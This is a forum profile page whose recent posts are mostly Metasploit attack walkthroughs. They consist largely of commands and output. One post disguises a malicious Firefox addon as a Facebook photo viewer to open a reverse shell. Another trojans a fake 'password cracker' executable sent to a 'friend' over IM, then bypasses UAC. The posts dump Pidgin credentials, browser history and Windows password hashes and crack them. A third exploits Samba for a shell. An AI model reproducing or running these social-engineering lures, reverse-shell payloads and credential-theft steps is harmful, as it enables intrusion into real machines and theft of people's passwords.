Jump to content

crossbower

Members
  • Posts

    17
  • Joined

  • Last visited

About crossbower

  • Birthday 08/08/1983

Converted

  • Interests
    Developer and Penetration Tester
  • Location
    Italy

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

crossbower's Achievements

Newbie

Newbie (1/14)

22

Reputation

  1. Mozilla Firefox Bootstrapped Addon Platform: victim=Windows 7 / attacker=kali linux Rank: Excellent Privileged: No / but with payload windows/meterpreter/reverse_tcp YES Mission : getsystem access with SYSTEM privileges right get pidgin creds get hashdump and crack the hash get firefox history stolen creds Description: This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page.The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions.As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed. References: https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions TippingPoint | DVLabs | XPI: The next malware vector? First steep we starting and run the services and msfconsole root@kali:~# service postgresql start && service metasploit start && msfconsole We get searching for firefox_xpi founding an exploit bootstraper addon msf > search firefox_xpi Matching Modules ================ exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 00:00:00 UTC excellent Mozilla Firefox Bootstrapped Addon Social Engineering Code Executio will be configuring the exploit: Basic options: Name Current Setting ---- --------------- ADDONNAME HTML5 Rendering Enhancements SRVHOST The local host to listen on. SRVPORT The local port to listen on. URIPATH The URI to use for this exploit In the video tutorial in configured for facebook-photo viewer ADDONNAME facebook hidden foto viewer SRVHOST 192.168.1.19 SRVPORT 80 URIPATH /facebook-photo-viewer.xpi msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME facebook hidden foto viewer ADDONNAME => facebook hidden foto viewer msf exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.19 SRVHOST => 192.168.1.19 msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80 SRVPORT => 80 msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /facebook-photo-viewer.xpi URIPATH => /facebook-photo-viewer.xpi msf exploit(firefox_xpi_bootstrapped_addon) > Setup a listener payload without official payloads PAYLOAD windows/meterpreter/reverse_tcp LHOST 192.168.1.19 LPORT 443 msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.19 LHOST => 192.168.1.19 msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 443 Setup the available targets 0 Universal (Javascript XPCOM Shell) 1 Windows x86 (Native Payload) 2 Windows x64 (Native Payload) 3 Linux x86 (Native Payload) 4 Linux x64 (Native Payload) 5 Mac OS X PPC (Native Payload msf exploit(firefox_xpi_bootstrapped_addon) > set TARGETS 1 TARGETS => 1 msf exploit(firefox_xpi_bootstrapped_addon) >exploits -j And run the exploit and the exploit creates a .xpi addon what we be presented to the victim via a web page .Once the victim clicks "install", the addon is installed and executes the payload with full user permissions. msf exploit(firefox_xpi_bootstrapped_addon) > exploit .[*] Exploit running as background job. .[*] Started reverse handler on 192.168.1.19:443 msf exploit(firefox_xpi_bootstrapped_addon) > .[*] Using URL: http://192.168.1.19:80/facebook-photo-viewer.xpi .[*] Server started.[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'.. .[*] 192.168.1.202 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'.. .[*] Sending stage (769024 bytes) to 192.168.1.202 .[*] Meterpreter session 1 opened (192.168.1.19:443 -> 192.168.1.202:49207) Now the game started , hunting for pidgin creds ,hashdump and firefox creds. Interactive meterpreter with session 1 ,>> getsystem for obtaining access SYSTEM priveliges. We have searching a service when running on SYSTEM priveliges on the remote system and migrating in this process.I used PID nr 2980 2980 468 svchost.exe x86 0 NT AUTHORITY\SYSTEM meterpreter > getsystem ...got system (via technique 1). meterpreter > migrate 2980 meterpreter > migrate 2980 .[*] Migrating from 1560 to 2980.. .[*] Migration completed successfully. meterpreter >getuid Server username: NT AUTHORITY\SYSTEM meterpreter > Now the system is ready for extracting the creds : firefox ,pidgin and hashdump. Now put the session opened in background and extract de firefox creds. Using post exploitasion windows/gather/forensics/browser_history meterpreter > background[*] Backgrounding session 1... msf exploit(bypassuac) > use windows/gather/forensics/browser_history msf post(browser_history) > set SESSION 1 SESSION => 1 msf post(browser_history) > exploit -j This modules serching cred in firefox ,chrome,skype [*] Gathering user profiles[*] Checking for Chrome History artifacts... [-] Chrome History directory not found for redmon[*] Checking for Chrome Archived History artifacts... [-] Chrome Archived History directory not found for redmon[*] Checking for Skype artifacts... [-] Skype directory not found for redmon[*] Checking for Firefox artifacts... [+] Firefox directory found redmon[*] Downloading C:\Users\redmon\AppData\Roaming\Mozilla\Firefox\Pr ofiles\3dtmxh0g.default\places.sqlite [+] Firefox artifact file saved to /root/.msf4/local/redmon_Firefox_3dtmxh0g.default_places.sqlite[*] Post module execution completed DONE Now we using a exploitasion for pidgin cred's msf post(browser_history) > use post/multi/gather/pidgin_cred msf post(pidgin_cred) > set CONTACTS 1 CONTACTS => 1 msf post(pidgin_cred) > set SESSION 1 SESSION => 1 msf post(pidgin_cred) >[*] Checking for Pidgin profile in: C:\Users\redmon\AppData\Roaming[*] Found C:\Users\redmon\AppData\Roaming\.purple[*] Reading accounts.xml file from C:\Users\redmon\AppData\Roaming\.purple[*] Collected the following credentials:[*] Server: <unknown>:5222[*] Protocol: prpl-jabber[*] Username: msftester@exploit.im[*] Password: unixunix[*] Collected the following contacts:[*] Buddy Name: wuala@jabber.ru[*] Alias: wuala[*] Protocol: prpl-jabber[*] Account: msftester@exploit.im[*] Post module execution completed DONE Now using exploitasion for extract the hashdump and crack it We need be returned in session opened msf post(pidgin_cred) > sessions -i 1[*] Starting interaction with 1... meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968::: redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4::: meterpreter > NOW cracking the hashes root@kali:~# echo "Administrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968::: redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4::: " >> pass.txt root@kali:~# john --format=nt pass.txt Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32]) 123456 (redmon) iloveyou (Administrator) DONE Have fun and thanks for watching and reading my tut's. http://www.youtube.com/watch?v=0DNBvPTBmow
  2. Frumos tutorial dar editeaza si pune authorul original : Dual-boot Windows 7 and Kali Linux | LinuxBSDos.com
  3. Pentest on Metasploitable 2 The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24 Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts 8 Captured ARP Req/Rep packets, from 8 hosts. Total size: 372 __________________________________________________ ___________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.1.91 08:00:27:4a:6c:50 01 042 CADMUS COMPUTER SYSTEMS 192.168.1.202 08:00:27:32:43:96 01 042 CADMUS COMPUTER SYSTEMS 192.168.1.1 00:25:53:3e:bc:b9 01 042 Unknown vendor 192.168.1.100 00:09:f8:65:35:64 01 060 UNIMO TECHNOLOGY CO., LTD. 192.168.1.132 00:21:9b:20:a3:bb 01 060 Unknown vendor Using nmap scanner for identif. port 139 Samba service. root@kali:~# nmap -p 139 -sV 192.168.1.91 Starting Nmap 6.40 ( http://nmap.org ) Nmap scan report for 192.168.1.91 Host is up (0.00017s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems) And play game : root@kali:~# service postgresql start && service metasploit start && msfconsole msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set RHOST 192.168.1.91 RHOST => 192.168.1.91 msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse msf exploit(usermap_script) > set LHOST 191.168.1.19 LHOST => 191.168.1.19 msf exploit(usermap_script) > msf exploit(usermap_script) > exploit [ *] Started reverse double handler[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo BgB1yKJSt3wbArQy;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nBgB1yKJSt3wbArQy\r\n[*] Matching...[*] B is input...[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504) VIDEO TUT http://www.youtube.com/watch?v=S3uvS3qEpm8
  4. Binary Payloads It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software. Exemple with little joke : My friend need a good passwd cracker.I created for him a best passwd cracker How to create a binary payload : Binary Payloads - Metasploit Unleashed We generate a Windows meterpreter executable that will connect back to us on port 443 msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exe Now the windows executable is created, we will use 'exploit/multi/handler' which is a stub that handles exploits launched outside of the framework. msf > use exploit/multi/handler msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.19 LHOST => 192.168.1.19 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) >exploit And the listener started Waiting for a victim: msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.19:443[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250) And I delivered for via IM for "my friend",..he executed the binary payload and the game started for hunting hashdump. Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. More info of privilege escalation here Privilege Escalation - Metasploit Unleashed Befor we take a hashdump we need running with SYSTEM priveleges. meterpreter > getuid Server username: redmon-PC\redmon This session I put in the background session 1 and I used meterpreter module bypassuac. Reference : Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ? Source : Windows Escalate UAC Protection Bypass msf > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set SESSION 1 msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/revers_tcp payload => windows/meterpreter/reverse_tcp msf exploit(bypassuac) > set LHOST 192.168.1.19 LHOST => 192.168.1.19 msf exploit(bypassuac) > set LPORT 8989 LPORT => 8989 msf exploit(bypassuac) > exploit [*] Started reverse handler on 192.168.1.19:5555 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing...[*] Checking admin status... [+] Part of Administrators group! Continuing...[*] Uploading the bypass UAC executable to the filesystem...[*] Meterpreter stager executable 73802 bytes long being uploaded..[*] Uploaded the agent to the filesystem....[*] Sending stage (769024 bytes) to 192.168.1.202 [*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171) Now migrate one of the process wich running a SYSTEM privileges Running ps command we seen a process we need for SYSTEM privs 1996 448 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM Migrating a process SearchIndexer.exe meterpreter > migrate 1996[*] Migrating from 3456 to 1996...[*] Migration completed successfully. Now we running a 'getsystem' techniques to attempt to gain SYSTEM level privileges. meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM NOW THE SYSTEM READY FOR I TAKE A HASHDUMP meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968::: redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4::: The hashes I cracked with john passwd cracker.The metasploit have a jtr modules for cracking Sorry for mistakes I was tired and still working workplace VIDEO TUT: http://www.youtube.com/watch?v=j6dZIrO0890
  5. Vad ca ai primit ban de care sincer din toate inima ma bucur. Welcome Back
  6. Bun tutorial Nytro dar nu reusesc sa le folosesc. Dupa cu se vede si in tutorial foloseste modulul post/linux/gather/hashdump dar modulul hashdump se poate folosi daca avem acces de root!! [*] Exploit running as background job. [*] Started reverse handler on xxx.xxx.xxx.xxx:443 [*] Starting the payload handler.. [*] Sending stage (39217 bytes) to 195.234.171.250... [*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:443 -> 195.234.171.250:34911) msf > use post/linux/gather/hashdump msf post(hashdump) > set VERBOSE 1 VERBOSE => 1 msf post(hashdump) > set SESSION 1 SESSION => 1 msf post(hashdump) > run -j [*] Post module running as background job [-] [COLOR="#FF0000"]You must run this module as root[/COLOR]
×
×
  • Create New...